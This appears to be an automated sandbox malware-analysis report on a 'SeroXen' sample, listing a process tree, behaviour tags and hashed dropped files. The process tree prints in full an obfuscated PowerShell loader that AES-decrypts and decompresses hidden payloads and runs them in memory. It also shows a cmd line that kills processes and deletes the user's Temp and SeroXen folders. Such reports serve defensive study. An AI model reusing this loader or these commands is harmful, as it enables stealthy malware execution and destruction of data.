C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 4 > nul & taskill /F /IM "SeroXen.exe" & taskill /F /IM "SeroXen HWID Reset.exe" & taskill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q %userprofile%\AppData\Local\SeroXen & rmdir /s /q %userprofile%\AppData\Local\SeroXen & del /f %userprofile%\Desktop\SeroXen.lnk & taskkill /F /IM "SeroXen.exe" & taskkill /F /IM "SeroXen HWID Reset.exe" & taskkill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & exit4⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 45⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen HWID Reset.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen Toolkit.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\SeroXen\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\7-Zip\7-zip.dllFilesize
99KB
MD58af282b10fd825dc83d827c1d8d23b53
SHA117c08d9ad0fb1537c7e6cb125ec0acbc72f2b355
SHA2561c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca
SHA512cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8
-
C:\Program Files\7-Zip\7z.dllFilesize
1.8MB
MD50009bd5e13766d11a23289734b383cbe
SHA1913784502be52ce33078d75b97a1c1396414cf44
SHA2563691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129
SHA512d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b
-
C:\Program Files\7-Zip\7zG.exeFilesize
691KB
MD5ef0279a7884b9dd13a8a2b6e6f105419
SHA1755af3328261b37426bc495c6c64bba0c18870b2
SHA2560cee5cb3da5dc517d2283d0d5dae69e9be68f1d8d64eca65c81daef9b0b8c69b
SHA5129376a91b8fb3f03d5a777461b1644049eccac4d77b44334d3fe292debed16b4d40601ebe9accb29b386f37eb3ccc2415b92e5cc1735bcce600618734112d6d0e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010Filesize
1.5MB
MD5f1320bd826092e99fcec85cc96a29791
SHA1c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed
SHA256ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba
SHA512c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
264B
MD56e520c8ba02100acab47360d8b920d1d
SHA16bd1ce7c29566bb047c60a4a0aaff7fd1516b3c6
SHA256630e2924647c58c62e728181cd08f423129eb6294968a25648a872368c8940e0
SHA512ec04c6b62b871cf06d5087472c722bf1ec45184372fc06e9d12e3fdcaab648c4444192ca2cf54b20e9886f2401c3ce04ffd198f91599d41c81e2928d557365c2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5b5bd254c3906a84949e080c00aafa886
SHA1adb2994d38ff5472714190cf44490bf9fd30cdf6
SHA25630d4792f225cc8c7a2bfa9f1f05b04c0269548e3ebc54d710928089727732dc0
SHA5128fdef654da38421679ebbf6b0078b7d679c436f7525c60c9250edd82d4ca6df48212000a1e22c2a28330da1010456de179db97082007ac6bb876dee1a90c9e08
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5a5c9cb9c97c91ada25c4e4aa726a9309
SHA1439f7cc84881e0c839fec3fe445158cef4df0710
SHA25660b17330a6eca970e0733b72c4563276771e8d782b78bdf0b2a46744380860bb
SHA5122371e1c2f01b7b1e871f47c30e60616d1ff9427e085399ebbf2c64983b60dc73ea837f93880125965595d122c77ed7f5958f5687be91dde50e853e3c5222f779
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD567f58a8ed071cef305cac9f0524a1c1d
SHA161a8c5f29dc3b861d6d34d5ef21010fc29f2a7c9
SHA256790b73a6f1bcf436801e80935ab19b935906fcdac1d24e9c45dfbab26fd10c36
SHA512d470676090be3661f441e33014b178a514c483dfd3730696785d71965681ef45b67bdd4f5b4749318635406af2cd8399af1b1949fb0e8350cf63a1fb5e498053
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
523B
MD5d97b68ce7248a52b79777d8d503c8483
SHA146d6760b6a5e839ef17d4014f958d0c787ca942f
SHA256e33264dc79d9c6425be89be67386e71797e257e3c12217c3447d705feb531eb9
SHA512e1b5bd6ea44c64219cd5c7cc155c3c0dfb938c66d09386168e3dba5f09efc7e3bcc2a3188b8781217171ff7a92a17dfec850d77cf127320b09f7de0792a409a5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5f75185bdbbfacf17c713bf7d41136f8e
SHA175dcddcedff98fa9875f0a9bfc971ad3bbe94ad3
SHA25662adae56970cef8d208f8bd402707ddf17d1782633d251b227871110c1346692
SHA512d6890b7fe4e67179eb586965917246d4ebaeffdd56703c55f7ee7ab0c99a27638d302dc49e8b6e4cbe4c3b8554c71c342aa1ffba7df851a090c2051cef7cc643
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD58a540799dcf537f8cae19710f2d2ba92
SHA1dc9aae962acb7882199d57d43bcc65e54db27f15
SHA256e7124230fb300fa6bf743e07586121e1a03896c1efdec28223563127df608ee5
SHA5121ceb719f5b5aadf2047197fb6015cf588f408c2e85fb97f2c9648edf4b4df6e933096d1791e13ae6ac77197a368449ecd60bba6d5413fec69fc186d9b83c50de
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD5cdf3edc6cd197bacd997bd69432627bc
SHA1b7742d8d24875f2d8c3753b905ed123bdc152307
SHA256311079d0fcc425f69548a8c6fed3eaffedc566b60e8aba30a8a20b39a0113ff5
SHA5123c5728504434d0a6978450689089eec9315dab5abe2ea5ddd67a127468f24f947e546331204e9629acd7167b5a6f1d344c9cafb08fe61a2990ad62a3fac7d0ab
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
269KB
MD552a7d97ab5aa38092d6a3969b43008c0
SHA153dcb347c47b7cd69dc6bc6ce0eb7cf6d8b6b2d6
SHA256b473721199faa6f09af9396256778dc6944358d0723425f54c8f85cd9d46b985
SHA51263a817180e84fb471e6e88a9fe4be2e94652fc7fd64c394bd21021ed70998f05c739c3e28adbab4135ad67a9506a5c94e93e764a5e270d3aaee9b6a7b1c9b8b1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
101KB
MD5305029c72772bf6ac22c6122f951972a
SHA1a9c5d3a5a7c226f06352068d0774990e7d33772c
SHA2565cdde1a3f8fb5dc59f6dff7a51d3270b517f999d052b14be7326055c39266e4b
SHA5123f4ebf52499c3050e7476549f8adf3c6faa981021c0e69082bd5425021448651bad2f8abaf81e43fab37ea0909f94b2b94a9d0642cad9db167f094f0237ccd1f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58654d.TMPFilesize
89KB
MD5d551f2474f984f9d2980299e4881cf2c
SHA17c235c2bc8ba89bd9fa6dd440d5b092ae2c880e5
SHA256da296403018194107bf7001f1798d619d80c917900a8d23d3087c8250d86c180
SHA5127ee5b832a872dc2c42ad5274f2eee1fd1f16d478083d69ce45430673e6c2a23df7d60a825f180449556ea7c6e707c01f9a11b5538a2fed5597116bbca283f552
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SeroXen.exe.logFilesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exeFilesize
334KB
MD5e9a1163f07012ba9cf0eeaa4f4274cb0
SHA1e67f4264c87ddee54d19f84b2b27d97c65960f90
SHA256dfa59e4d9561680fcaa24cd8960f3bb2e0ffd26100c1209f51c1be0f2a500508
SHA512f65b344b3ba17aa64d43a281e8e28cceb4a571d60dee3fadb1be045e319805da4ab301a809770c5e52223b371306be87c6ad75964eeed2948b23043fc14c3310
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exeFilesize
933KB
MD5a8df19d691e618c209f5c8e386deafcf
SHA1135ea4a1d3c7358f7bd6a51973c7be7ee52f0d36
SHA256821edf221e3b8fd8070cf04628e5f77507de5ecf9d1afea79375a22578b419c2
SHA51280c1989ed585c313c14b6a91847b0e8fd758b1ef3bc3550322e6b6cb561b1bd2cb461c9ceea98b3240628fe6f74c2760b2a8db5f3f81b058559a2aed57e53779
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\BouncyCastle.Crypto.dllFilesize
2.7MB
MD5845661718fc59d2ec1e59c804ea0a319
SHA10e280f4195b263b56d7bc2a8af06e66bc6fb6b84
SHA256068d21b18320762850a2ec079e43d24e41e8dc7b7d4d1e60b8b8a60161eee95d
SHA51213a23d645b09fa9debc2109417ea38fca9d2a8240ec8d2b9297bb5dfc3c7ed70aadf3d08c8b4980569fc14986262d5e48afe263bd2287eb5b0195c43f8b04b3d
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Cake.Core.dllFilesize
590KB
MD59c0d3ed2549d77758c8d0e730e4a2380
SHA14917b06f091836a4b46a70a0e230dae42a002d1c
SHA2565b4d014d493ce66208537a1394aba89190a93025bf71857c39d45f9c95685338
SHA51295ea708ff271be8e76e2fb9c27766a1a80647a865c6086cc1114a6e45cccd52d9f7dc46a631676869d3542abb4314ec9f334bcddec4259789f0e895b1daa606f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Cake.Powershell.dllFilesize
84KB
MD5b1df3b508e23822ad00398c763699107
SHA1a4595f098c07efb6f3082f7d8ffaba108d09cf5c
SHA25612f075efa29c981553c80f506647c712d12757f551d382216f08e5d652eb8e6b
SHA512be0f27503f4c2bf97c5d077cec1955d5c5a3cb627c8554b6342efb6b9bbb7d620c49f0163290cee40522583543faa5fbe17a49c7411c4151a21487b91824e10d
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Gma.System.MouseKeyHook.dllFilesize
57KB
MD5a3408d8823fad55cc76859e1bfca7033
SHA152f44344b4c44a0d30f71ead80751242f0d6a5fb
SHA25618742c1399b62ed53fef75a2c63ba94b8adfbbe5e09b8c2d8fb426d2f9e0ade5
SHA512840bede9a2f062eb2111fb0b1225ffb9c112165b2b1c5b49d48fb0e5e055e7772f37990d9d72d6d43d8359a3af9c00f1f7a2bdc2314619850a5d9ddbd11bac7f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Logic.NET.dllFilesize
472KB
MD5a78ca07fdfd93bcfdc37ca824ec58850
SHA1d9c5ef1261a74f87a06e0934535c9f6c436b91fb
SHA2568337d23ad9bcfd3fe1cb357d173a36307b16f2e8b65b2af7245746b6c23c7fb4
SHA512599e8357e03fce4d709452a6e2f0a8c4ff41eb477de92256b47a8b7599f86b153ce43d6c7b6c52a120ed6f708355e40f4b41802f0a9acfd85cdad897ab6c2040
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.CodeCoverage.Shim.dllFilesize
7KB
MD5f27e6a41d8b2aed44a4a3143a3e39ceb
SHA135337c506f859ac4c078bbea66334367a2ffd696
SHA256f3a346e1ba5250f06561a5e488f0378dd295a9c4ce1a5e3389c5bbb724421181
SHA512988b2f84d2f942e1dcb80fdb79fffd6f4212b82e961e20023beba4c3096df99f788b5887edc965bf54efa6884c7b43bbe60441acd38fd08039c1f503ff339eb4
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dllFilesize
124KB
MD5f5b0619323bd200045b6a54710fe1d2b
SHA14f598978d5768d00d541ccc2ba2d20c3185862ea
SHA256b4189ff9118c8daafdb59c3b851dec5e1cb099d3f93ed33dff818622fbad4134
SHA51296843c4bc24b57429421f7ddbbcb147b613ac9c5ae7ef1689ee5d22a75844ff98809da5f54c85f308cfb9dc399991a9cc086e7a9ad01c19b414c6dc344966b14
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dllFilesize
9KB
MD58bb527db67433b149bcc4b4e7f4f5115
SHA11cf1eb3ec9b8bd9aaa1b84320ab68549dca03ee8
SHA2565a496524dd381e1a98a0430024240a409fa62039e2db7bba692100fa59604e5a
SHA5120cc8dc74014f0eea614e9e088a80b9d009f303d4b8e073614d92593ca86e0c52dd5716090f7d1f1ecdeb9bf149d3d520e4549591fe4686cc4608f305a415d571
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dllFilesize
99KB
MD585392bce56ebfc0fa98053e387d9bc75
SHA18da051c274cbbcb385c1b118ac7084594b0b5042
SHA2562277d6eaa6fb3edc48c4c3b03aa024ecb89fb3e6ce1f23a348e77ea495e790cf
SHA512f9735e4772a7490e21c6851ea9af7f1c7d9283b4d4f3a6b41c64ce4cdfd88c71699c02a4bad6e585c34fc04a58544808350515ea4d71a9597ca5322f349ed0f5
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dllFilesize
25KB
MD52300250ee990b536eb9ec1401617213b
SHA129bf3b475506406ffa49814c300e209b7a4f1d11
SHA2560998ee28d8b43a5753f0a3af8d80bddaf414a3e03a8732981f4d719d67564fc2
SHA5121276f2a5941ac03315ee3d907ed2ead4e26c964b1567c08481e78c10e16d34c80d9349d4dd6cb8e72bc55f7b06e11d674ce62bd9fdd938219a656bf2015afb86
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.TestFramework.dllFilesize
58KB
MD5ae48ee9e36c045d98904c0e48ab661b1
SHA14734a4894906aacc58d57bb7c828d3af98197004
SHA256f5bc913c7410f7f4f1b0db7f0ddc90cac5858e4076d642744416830f7c2a4a6b
SHA512c98cb6ab212ebc1f82fe2d76e6c0838657f7b864b2c500d2952b9161744a83c69616df11c62f248345e4968ea767884684dc3f7e870be3712a58716eed27ac80
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Mdb.dllFilesize
191KB
MD5816bd7caee4eb82de66a3500aecdbcd4
SHA18c58f70335c60e5dc2ff27bea9568ab4886bc30b
SHA256bad4bd80811674ecb8a9247c15775cbb40df527441a0cdfd35d0b18ba3c93587
SHA5128119df718e37efed003fac05d48686d52aae132c324370142a2aca847af27c1455b63048199906bab5e0cbdd6ea15bbfd6f53a0cefeb786e0e557a54b9834c91
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Pdb.dllFilesize
265KB
MD5c6c90c9a2a3b7735c78ab274e1be51ac
SHA1e4a5aa44b47e605167e80d5b49ebdf844ccb91d5
SHA25614f9512115c3f24ea4433cc74b2ed4ad68122cfc38633f8ba83306d4c5628c1b
SHA5128e2cba3c2b08dc7cc27e5788b59660d0e6f40ae123138107b269b6cc603d569aff0c4b369c28ff473adaa5715cc96d373e0917d1b291daef4cd5d136700fc926
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Rocks.dllFilesize
100KB
MD5efc05992923eae4261142d6c6e0766ea
SHA1861dc1f1597330248586c75b3eaab0f36b2b3485
SHA2568f7d70e962f46af559614267c2153b4db6609a54f56f8388a0e16ba401970f52
SHA51270ba3cfc82884831c57626005fa30522711898f9a56bd8a3645c1eba7c8239be077cac5d011d6f7fae76439ae7e5c3f8864e592e5634964a4fe2a83196c0e84a
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.dllFilesize
1.8MB
MD5925879684b81b251f166e375dc722f27
SHA1eabfb765267902df4abe38c28ec894e3637332d3
SHA256867df4eae1113e63ad5d744477fb34954f339fca68c8b60cea1368e28503800e
SHA5126d2543ebdaea8ea3d9f2ee5b03f5de3142c8d3e08f36c4879aad76a6cb46da99cd8da869cf0262c4e677f81db1c8470feb7ea148ba67d21cd2d6b620da5ad02e
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.Backports.dllFilesize
413KB
MD57d4861a14f7d85efaae7df5121944e87
SHA1340cdd6e161176ea5d2a6a154cee032b992e11b8
SHA256880926c9af1f688d45062e54593a888578e81dc4620e2bef8bffe493c1e5bc9b
SHA512e3666f567ddaccc5a14158baaf121a3c760ab6fb2f2ab2035a5772c3c3bd58e0b07083944450206204d26fbbfe9d6fca3f7f1d8cc97369cbf55c74be0d8c3d89
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.ILHelpers.dllFilesize
15KB
MD51052681371e9dc33ba6e0b8afb384332
SHA103fb145610170064c2e70afde5fbbfa55b4d5c73
SHA25664c83b46cb099c02b4d860f58040bf0236326ec25b3217a4eff71e92a5ee37df
SHA512f7d7c27ac0e952dc35bad95ac4d6821614b804757c0326107522821ef9d9cdd9c0ef91bbe01d2c8304fce4bbc592aed513903dfa5b080ac75b9f6d0d10dcd77e
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\MonoMod.Utils.dllFilesize
886KB
MD5808f79ce91a5e67c9bdabef436abe714
SHA1a499ea1b2482b613825a980f2e851886ec661a1b
SHA25643f5d2893bd976ae0ce559c38d95eccb516325f9f654f8cebefb13554d36fd27
SHA51280f9ba3523afa57f15f6c600a92579ecdd0c65d6e7d0473ca35b1164efabf1b0d0414b41e713b08ad8e07e07cbfe16932c4d593cc4ce2ea453633f70ebc29f4c
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Newtonsoft.Json.dllFilesize
684KB
MD5c467814a1cf2cd5d297553f51aeb41db
SHA1d0d81e08833b59a51ec9df98b17b5d36e5b07bf5
SHA25625553ca736b5a1f10ab3f60a6f3594af79600d8ebb01875366f0e153d6c739ed
SHA51223709dc556fe1bdb2ce046da31fe6d5376456191aecb14cea0f7f7092ca08158ff45ac9e75805b9c0cb22cc35da7b7d7b8416d4fa96de4f7443956af10dad09b
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Open.Nat.dllFilesize
328KB
MD5de7413b148730d4b50baf70079ea3f77
SHA1f92dbc5d17c8bc92fd1f25e9e7e4b3b76120b9b7
SHA2569d8c06a65a9af7ddf36d67d9d7383b1808ae282b67fe412bf8b75adab4f8d020
SHA512c6b858190bf30438831ed7602581158f72f4b64b5b1fb07b85cde76c642a5f617d0106b37ab1ef79bf237713c41982563fb1be4402920d4532db7e5c1ce32304
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Quasar.Common.Tests.dllFilesize
11KB
MD5d83c314d13844ac6d938ec98ef5cc502
SHA111be0e01c20cbaa9dd71d5b73c13c64084441a8c
SHA256e7369839f74d8a3243108ff788eb6f916bda3ed8f123d6bdbdbf2f794f2c1af9
SHA51211a051b38dc9d3204f3688975e754a11c2f32008dc9cbfdb9664825eac4adea0f2b86f2823b99118e89089443408cc38575f02e35680001b26790b959a738f02
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Renci.SshNet.dllFilesize
3.7MB
MD538b483c1f86d2caf3bb0662dedef9516
SHA1147386f8d231fbaa50512fcbba6e9d12ebe92f3e
SHA256859e6c8f999af42e677a90f00482d33bc3a78884344f7fdff0e5b51f03ca3375
SHA5129c9ca5c3be7514bfdd5dce6258df71f7df8a1ac23f8a5e1ecc4d074301f6b9ed016e98e7280cb7e549f7808daacd5455aca894dbab8f2ac8aab72d5bee037bc8
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exeFilesize
378KB
MD5c14c7d9bdf750ed2922e93934281726f
SHA1ceed91150c87b5b836219e4ec94f13221a5e1f5c
SHA256624c25a5293b465fd3a37cc7be7405bd532311e28e96b84c0353cd6b9aa2179b
SHA5120934819074409b3ee995685d94bbcfd80a4e7c26e2bef0b4e81f3984d94cae61e8912f689fd3c6ebde17fd8df4f6e1cc79d8d99dfecde3b472a37b357da198d0
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\System.Management.Automation.dllFilesize
353KB
MD53f8ac0a7be2c53071bdc5da410815ee8
SHA1fd07dbe5dbaef1934dc96cd658fce699e8f4cd12
SHA25601ce775ddc060a4ce46100c2c4a109ed84827af8fa71745a49e34a1fbaa2858e
SHA512e922b29d6e65080d9c07988808bd35376c0393d5445be90724a74d2f676c2b6fc6ef602fe149372d40f01d7b21b05c6573050fb66d7e0fd28fd1c82f8493e029
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\System.ValueTuple.dllFilesize
62KB
MD5cc379594492af38d98913aea6fbc4408
SHA11eb806b5bedd1d79a2a304048b054605760e7a8b
SHA25691462515d169dd8aa19ec604e12c0b6c81d941c816869512680d027f9420d8da
SHA5128afa38da75bc4a3e094150f522ed7f88d7cfc6fe4a35516add16d2431794403908aa9bff886d34d6881ae70b83e2a26fb016ff4cbaee6bf9fb6fc33032180354
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\dnlib.dllFilesize
6.1MB
MD5d7b36d83104d9013f96abbee3107baca
SHA1456cf25a25f55a0f7a3edd89b2498c4311f5ba92
SHA2567b7291a45ae4e8f0b06d2ae26ad5cd7d8614189b101d3644aa36b5db2ff17a61
SHA5123a8fdcc6c3e84c5aeec6988388cf7b5f7419a55a9a293cfaf7da7cff536af6dd07596be3ea10648c620bcf568bb9f675fee5646dc7c3ea4252817e745c2f50b7
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\protobuf-net.dllFilesize
1.5MB
